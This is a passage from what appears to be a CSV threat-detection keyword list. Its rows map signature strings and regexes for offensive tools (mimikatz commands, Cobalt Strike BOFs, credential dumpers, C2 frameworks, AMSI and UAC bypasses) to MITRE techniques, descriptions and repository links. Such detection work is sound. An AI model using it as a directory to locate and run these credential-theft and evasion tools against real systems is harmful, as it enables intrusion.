in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*TrU57(C00K13s)*",".{0,1000}TrU57\(C00K13s\).{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*truecrypt2john.py*",".{0,1000}truecrypt2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*True-Demon*",".{0,1000}True\-Demon.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/True-Demon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*truerustyy/wcreddump*",".{0,1000}truerustyy\/wcreddump.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*trufflehog git *",".{0,1000}trufflehog\sgit\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*truffleHog*",".{0,1000}truffleHog.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1083 - T1081 - T1213 - T1212","TA0002 - TA0003 - TA0004 - TA0007","N/A","N/A","Information Gathering","https://github.com/dxa4481/truffleHog","1","0","N/A","N/A","10","13926","1514","2024-05-01T19:24:48Z","2016-12-31T05:08:12Z" "*TruffleSnout.exe*",".{0,1000}TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*--trusted-for-delegation --kdcHost *",".{0,1000}\-\-trusted\-for\-delegation\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*TrustedPath-UACBypass-BOF*",".{0,1000}TrustedPath\-UACBypass\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. 
The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*trustedsec/social-engineer-toolkit*",".{0,1000}trustedsec\/social\-engineer\-toolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*trustedsec/unicorn*",".{0,1000}trustedsec\/unicorn.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*Try opening it with Mimikatz now :)*",".{0,1000}Try\sopening\sit\swith\sMimikatz\snow\s\:\).{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*TryCatchHCF*",".{0,1000}TryCatchHCF.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting sniffing spoofing and data exfiltration tools","N/A","N/A","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Trying anon RCE using * for *",".{0,1000}Trying\sanon\sRCE\susing\s.{0,1000}\sfor\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*Trying to dump kernel to 
C:*",".{0,1000}Trying\sto\sdump\skernel\sto\sC\:.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*ts.php*vi.txt*",".{0,1000}ts\.php.{0,1000}vi\.txt.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ts::logonpasswords*",".{0,1000}ts\:\:logonpasswords.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*ts::mstsc*",".{0,1000}ts\:\:mstsc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*ts::multirdp*",".{0,1000}ts\:\:multirdp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*ts::remote*",".{0,1000}ts\:\:remote.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*ts::sessions*",".{0,1000}ts\:\:sessions.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*tspkg/decryptor.py*",".{0,1000}tspkg\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*TunnelGRE/Augustus*",".{0,1000}TunnelGRE\/Augustus.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","127","26","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*Tunneling failed! Start your own port forwarding/tunneling service at port *",".{0,1000}Tunneling\sfailed!\sStart\syour\sown\sport\sforwarding\/tunneling\sservice\sat\sport\s.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*TunnelVision/pushrouteconfig.sh*",".{0,1000}TunnelVision\/pushrouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*turn_keylogger*",".{0,1000}turn_keylogger.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*TVqQAAMAAAAEAAAA*",".{0,1000}TVqQAAMAAAAEAAAA.{0,1000}","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*TVqQAAMAAAAEAAAA*",".{0,1000}TVqQAAMAAAAEAAAA.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*twint -g=*km* -o * 
--csv*",".{0,1000}twint\s\-g\=.{0,1000}km.{0,1000}\s\-o\s.{0,1000}\s\-\-csv.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*twint -u * --since *",".{0,1000}twint\s\-u\s.{0,1000}\s\-\-since\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*twittor.py*",".{0,1000}twittor\.py.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","752","216","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*twittor-master.zip*",".{0,1000}twittor\-master\.zip.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","752","216","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*",".{0,1000}TWV0YXNwbG9pdCBSUEMgTG9hZGVy.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. 
Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Tycx2ry/SweetPotato*",".{0,1000}Tycx2ry\/SweetPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*Tylous/Ivy*",".{0,1000}Tylous\/Ivy.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Tylous/SourcePoint*",".{0,1000}Tylous\/SourcePoint.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*Tylous/ZipExec*",".{0,1000}Tylous\/ZipExec.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*TypeError/domained*",".{0,1000}TypeError\/domained.{0,1000}","offensive_tool_keyword","domained","A domain name enumeration tool","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/TypeError/domained","1","1","N/A","N/A","8","722","157","2021-04-11T09:54:50Z","2017-08-18T00:03:39Z" "*Tztufn/Nbobhfnfou/Bvupnbujpo/BntjVujmt*",".{0,1000}Tztufn\/Nbobhfnfou\/Bvupnbujpo\/BntjVujmt.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*-u SSARedTeam:s3cr3t*",".{0,1000}\-u\sSSARedTeam\:s3cr3t.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*U2hlbGxjb2RlIFBhdGg=*",".{0,1000}U2hlbGxjb2RlIFBhdGg\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*U2VhdGJlbHQuZXhl*",".{0,1000}U2VhdGJlbHQuZXhl.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl*",".{0,1000}U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - 
T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNNYW5hZ2VkCg==*",".{0,1000}U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNNYW5hZ2VkCg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*uac fodhelper *",".{0,1000}uac\sfodhelper\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*uac sdclt *",".{0,1000}uac\ssdclt\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*uac_bypass*",".{0,1000}uac_bypass.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
